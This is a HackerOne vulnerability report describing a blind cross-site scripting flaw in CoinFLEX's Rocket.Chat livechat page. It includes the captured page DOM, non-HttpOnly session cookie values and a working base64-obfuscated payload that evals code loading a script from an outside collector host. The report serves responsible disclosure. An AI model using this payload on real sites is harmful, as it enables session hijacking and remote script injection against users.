HackerOne report H1:1091118 (reporter: cyberasset)
History: Jan 31, 2021 - 8:01 a.m.

Rocket.Chat: Blind XSS

2021-01-31 08:01:56
cyberasset
hackerone.com
23
cross-site scripting
vulnerable page
user input
html markup
cookies
dom
javascript injection
session hijacking
document object model
livechat
coinflex
blind xss

EPSS

0.001

Percentile

34.0%

Blind XSS

The page located at https://livechat.coinflex.com/livechat suffers from a Cross-site Scripting
(XSS) vulnerability. XSS is a vulnerability which occurs when user input is unsafely
incorporated into the HTML markup of a webpage. When that input is not properly escaped, an
attacker can inject malicious JavaScript that, once evaluated, can be used to hijack
authenticated sessions and rewrite the vulnerable page's layout and functionality. The
following report contains information on an XSS payload that has fired on
https://livechat.coinflex.com; it can be used to reproduce and remediate the vulnerability.

XSS Payload Fire Details

Vulnerable Page

https://livechat.coinflex.com/livechat

Referer

https://coinflex.com/

User Agent

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36

Cookies (Non-HTTPOnly)

rc_rid=tjtzHoTga9m4EBM3o; rc_token=0917lb1vvydakojqdvlrm7; rc_room_type=l

Document Object Model (DOM)
<html dir="ltr"><head><meta charset="utf-8"><title>Rocket.Chat.Livechat</title><meta
name="viewport" content="width=device-width,initial-scale=1"><link rel="stylesheet"
type="text/css" href="/livechat/61.chunk.a8a84.css"><script charset="utf-8"
src="/livechat/61.chunk.6a8fa.js"></script><link rel="stylesheet" type="text/css"
href="/livechat/62.chunk.e3920.css"><script charset="utf-8"
src="/livechat/62.chunk.39808.js"></script><script charset="utf-8"
src="/livechat/i18n.en.chunk.2a3c0.js"></script></head><body data-new-gr-c-s-check-
loaded="14.993.0" data-gr-ext-installed="" data-new-gr-c-s-loaded="14.993.0"&gt;<div><div>&lt;style&gt;
.screen__sskEr {
--color: #9437ff;
}
&lt;/style&gt;<div><div><header><div><div>CoinFLEX Live
Chat</div></div><nav>&lt;button
class="header__action__2wnEh" aria-label="Disable notifications"&gt;&lt;svg
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18" width="20" height="20"&gt;&lt;path
d="M4.619 10.532V6.374c0-2.296 1.962-4.158 4.381-4.158 2.419 0 4.381 1.862 4.381
4.158v4.158l1.643 3.118H2.976l1.643-3.118zm3.047 4.426h2.668c-.195.514-.716.884-
1.334.884s-1.139-.37-1.334-.884zm7.048-8.625C14.714 3.388 12.155 1 9 1 5.845 1 3.286
3.388 3.286 6.333V10.6L1 14.867h5.201C6.465 16.084 7.618 17 9 17s2.535-.916 2.799-
2.133H17L14.714 10.6V6.333z" fill="currentColor"
fill-rule="evenodd"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;button class="header__action__2wnEh" aria-
label="Minimize chat"&gt;&lt;svg viewBox="0 0 18 18" xmlns="http://www.w3.org/2000/svg"
width="20" height="20"&gt;&lt;path d="M16.071 5L9 12.071 1.929 5" stroke="currentColor"stroke-width="1.5" fill="none"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;button
class="header__action__2wnEh" aria-label="Expand chat"&gt;&lt;svg viewBox="0 0 20 20"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;path d="M15.286
1H2.715c-.947 0-1.714.767-1.714 1.714v12.571A1.714 1.714 0 002.715 17h12.571c.947 0
1.714-.768 1.714-1.715V2.715C17 1.767 16.233 1 15.286 1zm.571 14.286a.572.572 0
01-.571.571H2.715a.572.572 0
01-.571-.571V2.715c0-.315.256-.571.571-.571h12.571c.315
0 .571.256.571.571v12.571zM4.554 13.244a.429.429 0 010-.606l6.97-6.97-.025-.025-
3.213.012a.429.429 0 01-.429-.428V4.87c0-.237.192-.429.429-.429l4.857-.012c.237
0 .429.192.429.428l-.013 4.858a.429.429 0 01-.428.428h-.357a.429.429 0
01-.429-.428l.012-3.213-.025-.026-6.97 6.97a.429.429 0 01-.606 0l-.202-.202z" stroke-
width=".3" fill="currentColor" stroke="currentColor"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;</nav><div></div></header><div>&lt;input type="file"
class="drop__input__2o6so"&gt;&lt;main class="screen__main__DBTEi screen__main--
nopadding__16Bsg"&gt;<div><div><ol></ol></div></div>&lt;/main&gt;<footer><div><div><div>&lt;button type="button"
class="composer__action__2ZuQd"&gt;&lt;svg viewBox="0 0 20 20"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;g fill="none" fill-
rule="evenodd"&gt;&lt;circle cx="12" cy="8" r="1" fill="currentColor"&gt;&lt;/circle&gt;&lt;circle cx="8"
cy="8" r="1" fill="currentColor"&gt;&lt;/circle&gt;&lt;circle cx="10" cy="10" r="7" stroke="currentColor"
stroke-width="1.5"&gt;&lt;/circle&gt;&lt;path d="M7.172 12.328a4 4 0 005.656 0"
stroke="currentColor" stroke-width="1.5"&gt;&lt;/path&gt;&lt;/g&gt;&lt;/svg&gt;&lt;/button&gt;</div><div>"&gt;&lt;input onfocus="eval(atob(this.id))"
id="dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHB
zOi8vYXNzZXRjeWJlci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYS
k7" autofocus=""&gt;</div><div>&lt;button type="button"
class="composer__action__2ZuQd"&gt;&lt;svg viewBox="0 0 24 24"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;path d="M10.342
13.283l9.56-10.359-13.049 8.264L1 8.778 21.506 1l-7.778 20.506-3.386-8.223z"
fill="currentColor" stroke="currentColor" stroke-width="1.5" fill-rule="evenodd" stroke-
linecap="round" stroke-linejoin="round"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;</div></div></div><div><h3>Powered by <a href="https://rocket.chat" target="_blank">&lt;svg viewBox="0 0
1500 272" xmlns="http://www.w3.org/2000/svg" class="powered-by__logo__2Y08v"
width="60" height="10.88" role="img" aria-label="Rocket.Chat"&gt;&lt;g fill="none" fill-
rule="evenodd"&gt;&lt;path class="text" d="M461.588 132.646c0 15.237-5.687 25.243-16.607
30.016l15.699 59.582c.681 2.734-.681 4.092-3.186 4.092h-23.663c-2.274 0-3.41-1.135-
3.867-3.184l-15.244-57.76h-15.699v57.31c0 2.276-1.362 3.634-3.64 3.634h-23.663c-2.274
0-3.64-1.365-3.64-3.634V48.052c0-2.273 1.366-3.638 3.64-3.638h57.107c21.385 0 32.763
11.372 32.763 32.746v55.49zm-40.043 2.727c5.914 0 9.1-3.184 9.1-9.095V83.525c0-
5.911-3.186-9.092-9.1-9.092h-22.524v60.943l22.524-.004zm58.235-58.217c0-21.375
11.374-32.746 32.763-32.746h25.483c21.385 0 32.763 11.372 32.763 32.746v116.43c0
21.371-11.377 32.743-32.763 32.743h-25.483c-21.389 0-32.763-11.372-32.763-
32.743V77.156zm52.555 119.84c5.914 0 9.1-2.957 9.1-9.095V82.84c0-5.911-3.186-9.095-
9.1-9.095h-13.194c-5.914 0-9.1 3.184-9.1 9.095V187.9c0 6.134 3.186 9.091 9.1
9.091h13.194zm152.425-95.281c0 2.276-1.366 3.638-3.636 3.638h-22.751c-2.505 0-3.64-
1.361-3.64-3.638v-18.19c0-5.911-3.183-9.092-9.097-9.092h-11.832c-6.14 0-9.1 3.181-9.1
9.092v103.7c0 6.138 3.183 9.088 9.1 9.088h11.832c5.914 0 9.097-2.954 9.097-9.088v-
18.198c0-2.276 1.135-3.638 3.64-3.638h22.75c2.282 0 3.637 1.361 3.637 3.638v24.562c0
21.371-11.604 32.743-32.759 32.743h-25.483c-21.385 0-32.99-11.372-32.99-32.743V77.149c0-21.375 11.604-32.746 32.99-32.746h25.483c21.158 0 32.759 11.372
32.759 32.746v24.559zm96 124.618c-2.735 0-4.321-1.135-5.236-3.408l-28.662-67.542-
8.423 16.148v50.253c0 2.958-1.589 4.55-4.548 4.55h-21.843c-2.958 0-4.551-1.592-4.551-
4.55V48.954c0-2.953 1.593-4.549 4.551-4.549h21.843c2.956 0 4.548 1.592 4.548
4.55v70.495l35.037-71.634c1.14-2.273 2.736-3.41 5.237-3.41H802.6c3.413 0 4.778 2.276
3.182 5.456l-38.673 79.364 41.174 91.874c1.593 2.958.227 5.23-3.41
5.23H780.76zM915.67 70.791c0 2.273-.912 3.865-3.64 3.865h-56.88v45.48h43.456c2.281
0 3.64 1.365 3.64 3.865v22.513c0 2.503-1.366 3.869-3.64
3.869H855.15v45.934h56.88c2.735 0 3.64 1.138 3.64 3.638v22.743c0 2.273-.912 3.63-
3.64 3.63h-83.725c-2.05 0-3.416-1.365-3.416-3.63V48.048c0-2.273 1.366-3.638 3.416-
3.638h83.725c2.735 0 3.64 1.365 3.64 3.638V70.79zm105.56-26.381c2.501 0 3.64 1.365
3.64 3.638V70.79c0 2.273-1.139 3.638-3.64 3.638h-26.391v148.27c0 2.5-1.135 3.63-3.636
3.63H967.54c-2.282 0-3.64-1.13-3.64-3.63V74.429h-26.388c-2.282 0-3.64-1.365-3.64-
3.638V48.048c0-2.273 1.366-3.638 3.64-3.638h83.718zm1.38 156.493c0-2.957 1.593-
4.546 4.552-4.546h20.704c2.959 0 4.548 1.589 4.548 4.546v20.917c0 2.96-1.59 4.55-
4.548 4.55h-20.704c-2.96 0-4.552-1.59-4.552-4.55v-20.917zm143.75-99.188c0 2.276-1.37
3.638-3.64 3.638h-22.75c-2.502 0-3.637-1.361-3.637-3.638v-18.19c0-5.911-3.183-9.092-
9.097-9.092h-11.832c-6.144 0-9.1 3.181-9.1 9.092v103.7c0 6.138 3.183 9.088 9.1
9.088h11.832c5.914 0 9.097-2.954 9.097-9.088v-18.198c0-2.276 1.135-3.638 3.636-
3.638h22.751c2.281 0 3.64 1.361 3.64 3.638v24.562c0 21.371-11.604 32.743-32.763
32.743h-25.483c-21.385 0-32.99-11.372-32.99-32.743V77.149c0-21.375 11.604-32.746
32.99-32.746h25.483c21.162 0 32.763 11.372 32.763 32.746v24.559zm82.81-53.667c0-
2.273 1.362-3.638 3.636-3.638h23.432c2.732 0 3.864 1.365 3.864 3.638v174.65c0 2.273-
1.135 3.63-3.864 3.63h-23.432c-2.28 0-3.636-1.365-3.636-3.63v-72.315h-29.123v72.319c0
2.276-1.366 3.634-3.64 3.634h-23.429c-2.735 0-3.87-1.365-3.87-3.634V48.052c0-2.273
1.135-3.638 3.87-3.638h23.43c2.28 0 3.639 1.365 3.639
3.638v72.315h29.123V48.052zm134.66 178.285c-2.047 0-3.182-1.135-3.64-3.184l-6.368-
33.197h-40.5l-6.137 33.197c-.458 2.05-1.593 3.184-3.64 3.184h-24.341c-2.501 0-3.64-
1.365-2.963-3.865l37.77-174.88c.457-2.273 1.82-3.184 3.866-3.184h31.628c2.047 0
3.413.911 3.867 3.184l37.77 174.88c.457 2.5-.455 3.865-3.183 3.865h-24.128zm-30.262-
142.13l-14.56 79.364h29.123l-14.563-79.364zM1496.23 44.41c2.501 0 3.64 1.365 3.64
3.638V70.79c0 2.273-1.139 3.638-3.64 3.638h-26.388v148.27c0 2.5-1.139 3.63-3.64
3.63h-23.663c-2.274 0-3.636-1.13-3.636-3.63V74.429h-26.388c-2.278 0-3.637-1.365-
3.637-3.638V48.048c0-2.273 1.366-3.638 3.637-3.638h83.715z"&gt;&lt;/path&gt;&lt;path
class="rocket" d="M270.5 105.32l.004.006-.002-.003-.002-.003zM92.94 11.47c9.508 5.28
18.496 11.962 26.171 19.388 12.373-2.24 25.13-3.37 38.072-3.37 38.744 0 75.477 10.163
103.42 28.612 14.473 9.559 25.977 20.9 34.189 33.712 9.145 14.276 13.78 29.63 13.78
46.08 0 16.007-4.636 31.365-13.78 45.64-8.211 12.817-19.715 24.156-34.189 33.715-
27.948 18.45-64.678 28.607-103.42 28.607-12.942 0-25.697-1.13-38.072-3.368a126.331
126.331 0 01-26.171 19.388c-50.802 25.443-92.931.599-92.931.599s39.169-33.254
32.799-62.405C15.283 180.106 5.787 158.44 5.787 135.456c0-22.552 9.499-44.217
27.021-62.182C39.177 44.13.022 10.883.009 10.872c.013-.008 42.136-24.844
92.931.598z" fill="#DB2323" fill-rule="nonzero"&gt;&lt;/path&gt;&lt;path d="M62.545 186.04c-17.412-
13.722-27.863-31.281-27.863-50.419 0-43.916 55.032-79.517 122.92-79.517 67.885 0
122.92 35.601 122.92 79.517s-55.032 79.517-122.92 79.517c-16.731 0-32.681-2.163-
47.219-6.079L99.754 219.31c-5.775 5.57-12.544 10.61-19.6 14.582-9.352 4.593-18.588
7.099-27.725 7.863.515-.937.99-1.886 1.5-2.825 10.65-19.618 13.523-37.248 8.618-
52.89z" fill="#fff"&gt;&lt;/path&gt;&lt;path class="rocket" d="M98.656 154.54c-9.98 0-18.071-8.22-
18.071-18.361s8.09-18.361 18.071-18.361c9.98 0 18.071 8.22 18.071 18.361s-8.09
18.361-18.071 18.361zm58.179 0c-9.98 0-18.071-8.22-18.071-18.361s8.09-18.361 18.071-
18.361 18.071 8.22 18.071 18.361-8.09 18.361-18.071 18.361zm58.179 0c-9.98 0-18.071-
8.22-18.071-18.361s8.09-18.361 18.071-18.361c9.98 0 18.071 8.22 18.071 18.361s-8.09
18.361-18.071 18.361z" fill="#DB2323"
fill-rule="nonzero"&gt;&lt;/path&gt;&lt;/g&gt;&lt;/svg&gt;</a></h3></div></footer></div><div></div></div></div>&lt;button type="button" aria-label="C"class="button__3e1dX button--icon__3a2Uu screen__chat-button__2h7Ad"&gt;&lt;svg
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20"&gt;&lt;path d="M6 6l8.071 8.071m0-
8.071L6 14.071" stroke="currentColor" stroke-width="1.5" stroke-linecap="square"
fill="none"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;<audio src="https://livechat.coinflex.com/sounds/chime.mp3"></audio></div></div>&lt;script&gt; SERVER_URL =
'https://livechat.coinflex.com'; &lt;/script&gt;&lt;script
src="/livechat/0.chunk.85c58.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/polyfills.38c0c.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/vendors~bundle.chunk.b4ad3.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/bundle.e0274.js"&gt;&lt;/script&gt;&lt;script
src="https://assetcyber.xss.ht"&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;
Origin

https://livechat.coinflex.com

Payload for XSS

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXNzZXRjeWJlci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

Screenshot

Please find the attached image for the PoC.

Injection Timestamp

1612078544

Impact

Remediation

For more information about Cross-site Scripting and remediation of the issue, see the
following resources:
